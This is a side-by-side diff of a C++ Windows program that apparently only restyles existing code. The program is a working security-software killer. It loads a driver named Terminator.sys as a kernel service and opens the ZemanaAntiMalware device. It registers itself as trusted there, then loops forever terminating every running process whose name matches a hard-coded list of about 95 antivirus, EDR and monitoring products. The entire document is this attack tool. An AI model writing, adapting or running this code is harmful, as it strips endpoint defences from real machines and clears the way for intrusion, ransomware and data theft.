1 | 1 | | #define _CRT_SECURE_NO_WARNINGS |
2 | | - | #include <Windows.h> |
| 2 | + | |
3 | 3 | | #include <iostream> |
| 4 | + | |
4 | 5 | | #include <Windows.h> |
5 | 6 | | #include <tlhelp32.h> |
6 | 7 | | |
| skipped 1 lines |
8 | 9 | | |
9 | 10 | | #define IOCTL_TERMINATE_PROCESS 0x80002048 |
10 | 11 | | |
11 | | - | const char* const edrlist[] = { |
12 | | - | "activeconsole", |
13 | | - | "anti malware", |
14 | | - | "anti-malware", |
15 | | - | "antimalware", |
16 | | - | "anti virus", |
17 | | - | "anti-virus", |
18 | | - | "antivirus", |
19 | | - | "appsense", |
20 | | - | "authtap", |
21 | | - | "avast", |
22 | | - | "avecto", |
23 | | - | "canary", |
24 | | - | "carbonblack", |
25 | | - | "carbon black", |
26 | | - | "cb.exe", |
27 | | - | "ciscoamp", |
28 | | - | "cisco amp", |
29 | | - | "countercept", |
30 | | - | "countertack", |
31 | | - | "cramtray", |
32 | | - | "crssvc", |
33 | | - | "crowdstrike", |
34 | | - | "csagent", |
35 | | - | "csfalcon", |
36 | | - | "csshell", |
37 | | - | "cybereason", |
38 | | - | "cyclorama", |
39 | | - | "cylance", |
40 | | - | "cyoptics", |
41 | | - | "cyupdate", |
42 | | - | "cyvera", |
43 | | - | "cyserver", |
44 | | - | "cytray", |
45 | | - | "darktrace", |
46 | | - | "defendpoint", |
47 | | - | "defender", |
48 | | - | "eectrl", |
49 | | - | "elastic", |
50 | | - | "endgame", |
51 | | - | "f-secure", |
52 | | - | "forcepoint", |
53 | | - | "fireeye", |
54 | | - | "groundling", |
55 | | - | "GRRservic", |
56 | | - | "inspector", |
57 | | - | "ivanti", |
58 | | - | "kaspersky", |
59 | | - | "lacuna", |
60 | | - | "logrhythm", |
61 | | - | "malware", |
62 | | - | "mandiant", |
63 | | - | "mcafee", |
64 | | - | "morphisec", |
65 | | - | "msascuil", |
66 | | - | "msmpeng", |
67 | | - | "nissrv", |
68 | | - | "omni", |
69 | | - | "omniagent", |
70 | | - | "osquery", |
71 | | - | "palo alto networks", |
72 | | - | "pgeposervice", |
73 | | - | "pgsystemtray", |
74 | | - | "privilegeguard", |
75 | | - | "procwall", |
76 | | - | "protectorservic", |
77 | | - | "qradar", |
78 | | - | "redcloak", |
79 | | - | "secureworks", |
80 | | - | "securityhealthservice", |
81 | | - | "semlaunchsv", |
82 | | - | "sentinel", |
83 | | - | "sepliveupdat", |
84 | | - | "sisidsservice", |
85 | | - | "sisipsservice", |
86 | | - | "sisipsutil", |
87 | | - | "smc.exe", |
88 | | - | "smcgui", |
89 | | - | "snac64", |
90 | | - | "sophos", |
91 | | - | "splunk", |
92 | | - | "srtsp", |
93 | | - | "symantec", |
94 | | - | "symcorpu", |
95 | | - | "symefasi", |
96 | | - | "sysinternal", |
97 | | - | "sysmon", |
98 | | - | "tanium", |
99 | | - | "tda.exe", |
100 | | - | "tdawork", |
101 | | - | "tpython", |
102 | | - | "vectra", |
103 | | - | "wincollect", |
104 | | - | "windowssensor", |
105 | | - | "wireshark", |
106 | | - | "threat", |
107 | | - | "xagt.exe", |
108 | | - | "xagtnotif.exe" |
109 | | - | }; |
| 12 | + | const char* g_serviceName = "Terminator"; |
110 | 13 | | |
111 | | - | int edrlist_size = sizeof(edrlist) / sizeof(edrlist[0]); |
| 14 | + | const char* const g_edrlist[] = { |
| 15 | + | "activeconsole", "anti malware", "anti-malware", |
| 16 | + | "antimalware", "anti virus", "anti-virus", |
| 17 | + | "antivirus", "appsense", "authtap", |
| 18 | + | "avast", "avecto", "canary", |
| 19 | + | "carbonblack", "carbon black", "cb.exe", |
| 20 | + | "ciscoamp", "cisco amp", "countercept", |
| 21 | + | "countertack", "cramtray", "crssvc", |
| 22 | + | "crowdstrike", "csagent", "csfalcon", |
| 23 | + | "csshell", "cybereason", "cyclorama", |
| 24 | + | "cylance", "cyoptics", "cyupdate", |
| 25 | + | "cyvera", "cyserver", "cytray", |
| 26 | + | "darktrace", "defendpoint", "defender", |
| 27 | + | "eectrl", "elastic", "endgame", |
| 28 | + | "f-secure", "forcepoint", "fireeye", |
| 29 | + | "groundling", "GRRservic", "inspector", |
| 30 | + | "ivanti", "kaspersky", "lacuna", |
| 31 | + | "logrhythm", "malware", "mandiant", |
| 32 | + | "mcafee", "morphisec", "msascuil", |
| 33 | + | "msmpeng", "nissrv", "omni", |
| 34 | + | "omniagent", "osquery", "palo alto networks", |
| 35 | + | "pgeposervice", "pgsystemtray", "privilegeguard", |
| 36 | + | "procwall", "protectorservic", "qradar", |
| 37 | + | "redcloak", "secureworks", "securityhealthservice", |
| 38 | + | "semlaunchsv", "sentinel", "sepliveupdat", |
| 39 | + | "sisidsservice", "sisipsservice", "sisipsutil", |
| 40 | + | "smc.exe", "smcgui", "snac64", |
| 41 | + | "sophos", "splunk", "srtsp", |
| 42 | + | "symantec", "symcorpu", "symefasi", |
| 43 | + | "sysinternal", "sysmon", "tanium", |
| 44 | + | "tda.exe", "tdawork", "tpython", |
| 45 | + | "vectra", "wincollect", "windowssensor", |
| 46 | + | "wireshark", "threat", "xagt.exe", |
| 47 | + | "xagtnotif.exe" }; |
112 | 48 | | |
| 49 | + | int g_edrlistSize = sizeof(g_edrlist) / sizeof(g_edrlist[0]); |
113 | 50 | | |
| 51 | + | BOOL loadDriver(char* driverPath) { |
| 52 | + | SC_HANDLE hSCM, hService; |
114 | 53 | | |
115 | | - | BOOL |
116 | | - | LoadDriver( |
117 | | - | char* driverPath |
118 | | - | ) { |
119 | | - | SC_HANDLE hSCM, hService; |
120 | | - | const char* serviceName = "Terminator"; |
| 54 | + | // Open a handle to the SCM database |
| 55 | + | hSCM = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); |
| 56 | + | if (hSCM == NULL) |
| 57 | + | return (1); |
121 | 58 | | |
122 | | - | // Open a handle to the SCM database |
123 | | - | hSCM = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); |
124 | | - | if (hSCM == NULL) { |
125 | | - | return (1); |
126 | | - | } |
| 59 | + | // Check if the service already exists |
| 60 | + | hService = OpenServiceA(hSCM, g_serviceName, SERVICE_ALL_ACCESS); |
| 61 | + | if (hService != NULL) { |
| 62 | + | printf("Service already exists.\n"); |
127 | 63 | | |
128 | | - | // Check if the service already exists |
129 | | - | hService = OpenServiceA(hSCM, serviceName, SERVICE_ALL_ACCESS); |
130 | | - | if (hService != NULL) |
131 | | - | { |
132 | | - | printf("Service already exists.\n"); |
| 64 | + | // Start the service if it"s not running |
| 65 | + | SERVICE_STATUS serviceStatus; |
| 66 | + | if (!QueryServiceStatus(hService, &serviceStatus)) { |
| 67 | + | CloseServiceHandle(hService); |
| 68 | + | CloseServiceHandle(hSCM); |
| 69 | + | return (1); |
| 70 | + | } |
133 | 71 | | |
134 | | - | // Start the service if it"s not running |
135 | | - | SERVICE_STATUS serviceStatus; |
136 | | - | if (!QueryServiceStatus(hService, &serviceStatus)) |
137 | | - | { |
138 | | - | CloseServiceHandle(hService); |
139 | | - | CloseServiceHandle(hSCM); |
140 | | - | return (1); |
141 | | - | } |
| 72 | + | if (serviceStatus.dwCurrentState == SERVICE_STOPPED) { |
| 73 | + | if (!StartServiceA(hService, 0, nullptr)) { |
| 74 | + | CloseServiceHandle(hService); |
| 75 | + | CloseServiceHandle(hSCM); |
| 76 | + | return (1); |
| 77 | + | } |
142 | 78 | | |
143 | | - | if (serviceStatus.dwCurrentState == SERVICE_STOPPED) |
144 | | - | { |
145 | | - | if (!StartServiceA(hService, 0, nullptr)) |
146 | | - | { |
147 | | - | CloseServiceHandle(hService); |
148 | | - | CloseServiceHandle(hSCM); |
149 | | - | return (1); |
150 | | - | } |
| 79 | + | printf("Starting service...\n"); |
| 80 | + | } |
151 | 81 | | |
152 | | - | printf("Starting service...\n"); |
153 | | - | } |
| 82 | + | CloseServiceHandle(hService); |
| 83 | + | CloseServiceHandle(hSCM); |
| 84 | + | return (0); |
| 85 | + | } |
154 | 86 | | |
155 | | - | CloseServiceHandle(hService); |
156 | | - | CloseServiceHandle(hSCM); |
157 | | - | return (0); |
158 | | - | } |
| 87 | + | // Create the service |
| 88 | + | hService = CreateServiceA(hSCM, g_serviceName, g_serviceName, SERVICE_ALL_ACCESS, |
| 89 | + | SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, |
| 90 | + | SERVICE_ERROR_IGNORE, driverPath, NULL, NULL, NULL, |
| 91 | + | NULL, NULL); |
159 | 92 | | |
160 | | - | // Create the service |
161 | | - | hService = CreateServiceA( |
162 | | - | hSCM, |
163 | | - | serviceName, |
164 | | - | serviceName, |
165 | | - | SERVICE_ALL_ACCESS, |
166 | | - | SERVICE_KERNEL_DRIVER, |
167 | | - | SERVICE_DEMAND_START, |
168 | | - | SERVICE_ERROR_IGNORE, |
169 | | - | driverPath, |
170 | | - | NULL, |
171 | | - | NULL, |
172 | | - | NULL, |
173 | | - | NULL, |
174 | | - | NULL |
175 | | - | ); |
| 93 | + | if (hService == NULL) { |
| 94 | + | CloseServiceHandle(hSCM); |
| 95 | + | return (1); |
| 96 | + | } |
176 | 97 | | |
177 | | - | if (hService == NULL) { |
178 | | - | CloseServiceHandle(hSCM); |
179 | | - | return (1); |
180 | | - | } |
| 98 | + | printf("Service created successfully.\n"); |
181 | 99 | | |
182 | | - | printf("Service created successfully.\n"); |
| 100 | + | // Start the service |
| 101 | + | if (!StartServiceA(hService, 0, nullptr)) { |
| 102 | + | CloseServiceHandle(hService); |
| 103 | + | CloseServiceHandle(hSCM); |
| 104 | + | return (1); |
| 105 | + | } |
183 | 106 | | |
184 | | - | // Start the service |
185 | | - | if (!StartServiceA(hService, 0, nullptr)) |
186 | | - | { |
187 | | - | CloseServiceHandle(hService); |
188 | | - | CloseServiceHandle(hSCM); |
189 | | - | return (1); |
190 | | - | } |
191 | | - | |
192 | | - | printf("Starting service...\n"); |
| 107 | + | printf("Starting service...\n"); |
193 | 108 | | |
194 | | - | CloseServiceHandle(hService); |
195 | | - | CloseServiceHandle(hSCM); |
| 109 | + | CloseServiceHandle(hService); |
| 110 | + | CloseServiceHandle(hSCM); |
196 | 111 | | |
197 | | - | return (0); |
| 112 | + | return (0); |
198 | 113 | | } |
199 | 114 | | |
200 | | - | char* |
201 | | - | to_lowercase( |
202 | | - | const char* str |
203 | | - | ) |
204 | | - | { |
205 | | - | char* lower_str = _strdup(str); |
206 | | - | for (int i = 0; lower_str[i]; i++) |
207 | | - | { |
208 | | - | lower_str[i] = tolower((unsigned char)lower_str[i]); |
209 | | - | } |
210 | | - | return lower_str; |
| 115 | + | char* toLowercase(const char* str) { |
| 116 | + | char* lower_str = _strdup(str); |
| 117 | + | for (int i = 0; lower_str[i]; i++) { |
| 118 | + | lower_str[i] = tolower((unsigned char)lower_str[i]); |
| 119 | + | } |
| 120 | + | return lower_str; |
211 | 121 | | } |
212 | 122 | | |
213 | | - | int |
214 | | - | is_in_edrlist( |
215 | | - | const char* pn |
216 | | - | ) |
217 | | - | { |
218 | | - | char* tempv = to_lowercase(pn); |
219 | | - | for (int i = 0; i < edrlist_size; i++) |
220 | | - | { |
221 | | - | if (strstr(tempv, edrlist[i]) != NULL) |
222 | | - | { |
223 | | - | free(tempv); |
224 | | - | return (1); |
225 | | - | } |
226 | | - | } |
227 | | - | free(tempv); |
228 | | - | return (0); |
| 123 | + | int isInEdrlist(const char* pn) { |
| 124 | + | char* tempv = toLowercase(pn); |
| 125 | + | for (int i = 0; i < g_edrlistSize; i++) { |
| 126 | + | if (strstr(tempv, g_edrlist[i]) != NULL) { |
| 127 | + | free(tempv); |
| 128 | + | return (1); |
| 129 | + | } |
| 130 | + | } |
| 131 | + | free(tempv); |
| 132 | + | return (0); |
229 | 133 | | } |
230 | 134 | | |
231 | 135 | | DWORD |
232 | | - | check_EDR_Processes |
233 | | - | ( |
234 | | - | HANDLE hDevice |
235 | | - | ) { |
236 | | - | unsigned int procId = 0; |
237 | | - | unsigned int pOutbuff = 0; |
238 | | - | DWORD bytesRet = 0; |
239 | | - | int ecount = 0; |
240 | | - | HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); |
| 136 | + | checkEDRProcesses(HANDLE hDevice) { |
| 137 | + | unsigned int procId = 0; |
| 138 | + | unsigned int pOutbuff = 0; |
| 139 | + | DWORD bytesRet = 0; |
| 140 | + | int ecount = 0; |
| 141 | + | HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); |
241 | 142 | | |
242 | | - | if (hSnap != INVALID_HANDLE_VALUE) |
243 | | - | { |
244 | | - | PROCESSENTRY32 pE; |
245 | | - | pE.dwSize = sizeof(pE); |
| 143 | + | if (hSnap != INVALID_HANDLE_VALUE) { |
| 144 | + | PROCESSENTRY32 pE; |
| 145 | + | pE.dwSize = sizeof(pE); |
246 | 146 | | |
247 | | - | if (Process32First(hSnap, &pE)) |
248 | | - | { |
249 | | - | do |
250 | | - | { |
251 | | - | char exeName[MAX_PATH]; |
252 | | - | wcstombs(exeName, pE.szExeFile, MAX_PATH); |
| 147 | + | if (Process32First(hSnap, &pE)) { |
| 148 | + | do { |
| 149 | + | char exeName[MAX_PATH]; |
| 150 | + | wcstombs(exeName, pE.szExeFile, MAX_PATH); |
253 | 151 | | |
254 | | - | if (is_in_edrlist(exeName)) |
255 | | - | { |
256 | | - | procId = (unsigned int)pE.th32ProcessID; |
257 | | - | if (!DeviceIoControl(hDevice, IOCTL_TERMINATE_PROCESS, &procId, sizeof(procId), &pOutbuff, sizeof(pOutbuff), &bytesRet, NULL)) |
258 | | - | printf("faild to terminate %ws !!\n", pE.szExeFile); |
259 | | - | else |
260 | | - | { |
261 | | - | printf("terminated %ws\n", pE.szExeFile); |
262 | | - | ecount++; |
263 | | - | } |
264 | | - | } |
265 | | - | } while (Process32Next(hSnap, &pE)); |
266 | | - | } |
267 | | - | CloseHandle(hSnap); |
268 | | - | } |
269 | | - | return (ecount); |
| 152 | + | if (isInEdrlist(exeName)) { |
| 153 | + | procId = (unsigned int)pE.th32ProcessID; |
| 154 | + | if (!DeviceIoControl(hDevice, IOCTL_TERMINATE_PROCESS, &procId, |
| 155 | + | sizeof(procId), &pOutbuff, sizeof(pOutbuff), |
| 156 | + | &bytesRet, NULL)) |
| 157 | + | printf("faild to terminate %ws !!\n", pE.szExeFile); |
| 158 | + | else { |
| 159 | + | printf("terminated %ws\n", pE.szExeFile); |
| 160 | + | ecount++; |
| 161 | + | } |
| 162 | + | } |
| 163 | + | } while (Process32Next(hSnap, &pE)); |
| 164 | + | } |
| 165 | + | CloseHandle(hSnap); |
| 166 | + | } |
| 167 | + | return (ecount); |
270 | 168 | | } |
271 | 169 | | |
272 | | - | int |
273 | | - | main( |
274 | | - | void |
275 | | - | ) { |
| 170 | + | int main(void) { |
| 171 | + | WIN32_FIND_DATAA fileData; |
| 172 | + | HANDLE hFind; |
| 173 | + | char FullDriverPath[MAX_PATH]; |
| 174 | + | BOOL once = 1; |
276 | 175 | | |
277 | | - | WIN32_FIND_DATAA fileData; |
278 | | - | HANDLE hFind; |
279 | | - | char FullDriverPath[MAX_PATH]; |
280 | | - | BOOL once = 1; |
| 176 | + | hFind = FindFirstFileA("Terminator.sys", &fileData); |
281 | 177 | | |
282 | | - | hFind = FindFirstFileA("Terminator.sys", &fileData); |
283 | | - | |
284 | | - | if (hFind != INVALID_HANDLE_VALUE) { // file is found |
285 | | - | if (GetFullPathNameA(fileData.cFileName, MAX_PATH, FullDriverPath, NULL) != 0) { // full path is found |
286 | | - | printf("driver path: %s\n", FullDriverPath); |
287 | | - | } |
288 | | - | else { |
289 | | - | printf("path not found !!\n"); |
290 | | - | return(-1); |
291 | | - | } |
292 | | - | } |
293 | | - | else { |
294 | | - | printf("driver not found !!\n"); |
295 | | - | return(-1); |
296 | | - | } |
297 | | - | printf("Loading %s driver .. \n", fileData.cFileName); |
298 | | - | |
299 | | - | if (LoadDriver(FullDriverPath)) |
300 | | - | { |
301 | | - | printf("faild to load driver ,try to run the program as administrator!!\n"); |
302 | | - | return (-1); |
303 | | - | } |
304 | | - | |
305 | | - | printf("driver loaded successfully !!\n"); |
| 178 | + | if (hFind != INVALID_HANDLE_VALUE) { // file is found |
| 179 | + | if (GetFullPathNameA(fileData.cFileName, MAX_PATH, FullDriverPath, NULL) != |
| 180 | + | 0) { // full path is found |
| 181 | + | printf("driver path: %s\n", FullDriverPath); |
| 182 | + | } |
| 183 | + | else { |
| 184 | + | printf("path not found !!\n"); |
| 185 | + | return (-1); |
| 186 | + | } |
| 187 | + | } |
| 188 | + | else { |
| 189 | + | printf("driver not found !!\n"); |
| 190 | + | return (-1); |
| 191 | + | } |
| 192 | + | printf("Loading %s driver .. \n", fileData.cFileName); |
306 | 193 | | |
307 | | - | HANDLE hDevice = CreateFile(L"\\\\.\\ZemanaAntiMalware", GENERIC_WRITE | GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); |
| 194 | + | if (loadDriver(FullDriverPath)) { |
| 195 | + | printf("faild to load driver ,try to run the program as administrator!!\n"); |
| 196 | + | return (-1); |
| 197 | + | } |
308 | 198 | | |
309 | | - | if (hDevice == INVALID_HANDLE_VALUE) { |
310 | | - | printf("Failed to open handle to driver !! "); |
311 | | - | return (-1); |
312 | | - | } |
| 199 | + | printf("driver loaded successfully !!\n"); |
313 | 200 | | |
314 | | - | unsigned int input = GetCurrentProcessId(); |
| 201 | + | HANDLE hDevice = |
| 202 | + | CreateFile(L"\\\\.\\ZemanaAntiMalware", GENERIC_WRITE | GENERIC_READ, 0, |
| 203 | + | NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); |
315 | 204 | | |
316 | | - | if (!DeviceIoControl(hDevice, IOCTL_REGISTER_PROCESS, &input, sizeof(input), NULL, 0, NULL, NULL)) |
317 | | - | { |
318 | | - | printf("Failed to register the process in the trusted list %X !!\n", IOCTL_REGISTER_PROCESS); |
319 | | - | return (-1); |
320 | | - | } |
| 205 | + | if (hDevice == INVALID_HANDLE_VALUE) { |
| 206 | + | printf("Failed to open handle to driver !! "); |
| 207 | + | return (-1); |
| 208 | + | } |
321 | 209 | | |
322 | | - | printf("process registed in the trusted list %X !!\n", IOCTL_REGISTER_PROCESS); |
| 210 | + | unsigned int input = GetCurrentProcessId(); |
323 | 211 | | |
| 212 | + | if (!DeviceIoControl(hDevice, IOCTL_REGISTER_PROCESS, &input, sizeof(input), |
| 213 | + | NULL, 0, NULL, NULL)) { |
| 214 | + | printf("Failed to register the process in the trusted list %X !!\n", |
| 215 | + | IOCTL_REGISTER_PROCESS); |
| 216 | + | return (-1); |
| 217 | + | } |
324 | 218 | | |
325 | | - | printf("Terminating ALL EDR/XDR/AVs ..\nkeep the program running to prevent windows service from restarting them\n"); |
| 219 | + | printf("process registed in the trusted list %X !!\n", |
| 220 | + | IOCTL_REGISTER_PROCESS); |
326 | 221 | | |
| 222 | + | printf( |
| 223 | + | "Terminating ALL EDR/XDR/AVs ..\nkeep the program running to prevent " |
| 224 | + | "windows service from restarting them\n"); |
327 | 225 | | |
328 | | - | while (0x1) |
329 | | - | { |
330 | | - | if (!check_EDR_Processes(hDevice)) |
331 | | - | Sleep(1200); |
332 | | - | else |
333 | | - | Sleep(700); |
334 | | - | } |
| 226 | + | for (;;) { |
| 227 | + | if (!checkEDRProcesses(hDevice)) |
| 228 | + | Sleep(1200); |
| 229 | + | else |
| 230 | + | Sleep(700); |
| 231 | + | } |
335 | 232 | | |
336 | | - | system("pause"); |
| 233 | + | system("pause"); |
337 | 234 | | |
338 | | - | CloseHandle(hDevice); |
| 235 | + | CloseHandle(hDevice); |
339 | 236 | | |
340 | | - | return 0; |
| 237 | + | return 0; |
341 | 238 | | } |
342 | 239 | | |